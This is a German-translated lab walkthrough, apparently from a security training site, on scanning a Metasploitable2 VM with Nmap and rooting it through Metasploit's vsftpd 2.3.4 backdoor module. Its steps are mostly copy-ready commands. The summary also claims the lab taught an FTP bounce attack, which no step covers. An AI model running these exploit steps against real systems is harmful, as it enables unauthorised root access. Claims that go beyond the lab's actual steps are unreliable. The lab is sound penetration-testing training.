FTP-Dienstschwachstellen mit Nmap und Metasploit ausnutzen

NmapNmapBeginner
Jetzt üben

💡 Dieser Artikel wurde von AI-Assistenten übersetzt. Um die englische Version anzuzeigen, können Sie hier klicken

Einführung

In diesem Lab erfahren Sie, wie Sie Schwachstellen im File Transfer Protocol (FTP)-Dienst ausnutzen können, um unbefugten Zugang zu einer Zielmaschine zu erhalten. Das Szenario spielt im Bereich der Cybersicherheit, und Sie übernehmen die Rolle eines ethischen Hackers, der mit der Identifizierung und Ausnutzung von Schwachstellen auf einem anfälligen FTP-Server betraut ist.

Das Ziel dieses Labs besteht darin, root-Zugang zur Metasploitable2-Zielmaschine zu erhalten, indem Sie eine Schwachstelle im FTP-Dienst ausnutzen und das Metasploit Framework, ein beliebtes Penetrationstesting-Tool, verwenden. Durch diese praktische Erfahrung werden Sie das FTP Bounce Attack-Verfahren, Portscanning-Techniken und den Ausnutzungsprozess mit Metasploit besser verstehen.


Skills Graph

%%%%{init: {'theme':'neutral'}}%%%% flowchart RL nmap(("Nmap")) -.-> nmap/NmapGroup(["Nmap"]) nmap/NmapGroup -.-> nmap/port_scanning("Port Scanning Methods") nmap/NmapGroup -.-> nmap/host_discovery("Host Discovery Techniques") nmap/NmapGroup -.-> nmap/target_specification("Target Specification") nmap/NmapGroup -.-> nmap/service_detection("Service Detection") subgraph Lab Skills nmap/port_scanning -.-> lab-416132{{"FTP-Dienstschwachstellen mit Nmap und Metasploit ausnutzen"}} nmap/host_discovery -.-> lab-416132{{"FTP-Dienstschwachstellen mit Nmap und Metasploit ausnutzen"}} nmap/target_specification -.-> lab-416132{{"FTP-Dienstschwachstellen mit Nmap und Metasploit ausnutzen"}} nmap/service_detection -.-> lab-416132{{"FTP-Dienstschwachstellen mit Nmap und Metasploit ausnutzen"}} end

Einrichten der Lab-Umgebung

In diesem Schritt richten Sie die Lab-Umgebung ein, die aus zwei virtuellen Maschinen besteht: der Kali Linux-Maschine als Angreifer und der Metasploitable2-Maschine als Ziel.

  1. Starten Sie die Metasploitable2-VM, indem Sie den folgenden Befehl im Terminal ausführen:
sudo virsh start Metasploitable2

Warten Sie, bis die Zielmaschine gestartet ist. Dies kann 1-3 Minuten dauern.

  1. Überprüfen Sie, ob die Metasploitable2-Maschine läuft, indem Sie sie per Ping testen:
ping 192.168.122.102

Drücken Sie Ctrl+C, um den Ping-Vorgang zu beenden.

  1. Starten Sie den Kali Linux-Container und greifen Sie auf seine Bash-Shell zu:
docker run -ti --network host b5b709a49cd5 bash
  1. Testen Sie die Netzwerkverbindung zwischen dem Kali Linux-Container und der Metasploitable2-Maschine:
ping 192.168.122.102

Drücken Sie Ctrl+C, um den Ping-Vorgang zu beenden.

Nun laufen sowohl die Angriffsmaschine als auch die Zielmaschine, und Sie können mit dem Penetrationstesting beginnen.

Hinweis: Wenn Sie versehentlich die aktuelle Bash-Sitzung verlassen, wird der Kali-Container automatisch beendet. Sie können erneut docker run -ti --network host b5b709a49cd5 bash auf dem Host ausführen, um einen neuen Kali-Container zu starten und in die Bash-Shell zu gelangen, um das Experiment fortzusetzen.

Portscanning durchführen

In diesem Schritt verwenden Sie das Nmap-Scanning-Tool, um offene Ports und laufende Dienste auf der Metasploitable2-Zielmaschine zu identifizieren.

  1. Starten Sie den PostgreSQL-Datenbankdienst, der von Metasploit benötigt wird:
service postgresql start
  1. Initialisieren Sie die Metasploit-Datenbank:
msfdb init
  1. Starten Sie die Metasploit Framework-Konsole:
cd ~
msfconsole
  1. Verwenden Sie Nmap, um die Zielmaschine zu scannen und offene Ports zu identifizieren:
nmap -sV -T4 192.168.122.102

Die Option -sV aktiviert die Versionserkennung für offene Ports, und -T4 legt die Timing-Politik für ein schnelleres Scannen fest.

Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung

Ausnutzung der FTP-Dienst-Schwachstelle

In diesem Schritt nutzen Sie die identifizierte Schwachstelle im FTP-Dienst, um unbefugten Zugang zur Metasploitable2-Zielmaschine zu erhalten.

  1. Wenn Sie nicht bereits in der Metasploit-Konsole sind, starten Sie zunächst die Metasploit-Konsole:
cd ~
msfconsole
  1. Suchen Sie in Metasploit nach einem FTP-Scanner-Modul:
search scanner/ftp
  1. Verwenden Sie das ftp_version-Modul, um den FTP-Dienst zu scannen:
use auxiliary/scanner/ftp/ftp_version
  1. Legen Sie den Zielhost für den Scan fest:
set RHOSTS 192.168.122.102
  1. Führen Sie den FTP-Versionsscan aus:
exploit
  1. Basierend auf der identifizierten FTP-Version suchen Sie nach einem entsprechenden Ausnutzungsmodul:
search vsFTPd
  1. Nutzen Sie das vsftpd_234_backdoor-Modul, um die Schwachstelle auszunutzen:
use exploit/unix/ftp/vsftpd_234_backdoor
  1. Legen Sie den Zielhost für die Ausnutzung fest:
set RHOST 192.168.122.102
  1. Führen Sie die Ausnutzung aus:
exploit

Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung

Überprüfung der erfolgreichen Ausnutzung

In diesem Schritt überprüfen Sie, ob die Ausnutzung erfolgreich war und ob Sie root-Zugang zur Metasploitable2-Zielmaschine erhalten haben.

  1. Wenn Sie nicht bereits in der Metasploit-Konsole sind, starten Sie zunächst die Metasploit-Konsole:
cd ~
msfconsole
  1. Prüfen Sie den aktuellen Benutzer:
whoami
  1. Prüfen Sie den Hostnamen der kompromittierten Maschine:
hostname
  1. Prüfen Sie die IP-Adresse der kompromittierten Maschine:
ifconfig

Drücken Sie Ctrl+D, um die Metasploit-Konsole zu beenden, und starten Sie dann die Prüfung

Zusammenfassung

In diesem Lab haben Sie gelernt, wie Sie eine Schwachstelle im FTP-Dienst ausnutzen können, um unbefugten Zugang zu einer Zielmaschine zu erhalten. Sie haben eine Lab-Umgebung mit einer anfälligen Metasploitable2-Maschine und einer Kali Linux-Angriffsmaschine eingerichtet. Sie haben mithilfe von Nmap ein Portscanning durchgeführt, um offene Ports und Dienste zu identifizieren, und dann die Metasploit Framework genutzt, um eine identifizierte Schwachstelle im FTP-Dienst auszunutzen. Schließlich haben Sie die erfolgreiche Ausnutzung überprüft, indem Sie den aktuellen Benutzer, den Hostnamen und die IP-Adresse der kompromittierten Maschine geprüft haben.

Durch diese praktische Erfahrung haben Sie praktisches Wissen und Fähigkeiten in der Identifizierung und Ausnutzung von Schwachstellen, der Verwendung beliebter Cybersicherheitstools wie Nmap und Metasploit sowie dem Verständnis der FTP Bounce Attack-Technik erworben. Diese Fähigkeiten sind für ethische Hacker und Cybersicherheitsexperten unerlässlich, um die Sicherheitslage von Systemen und Netzwerken zu bewerten und zu stärken.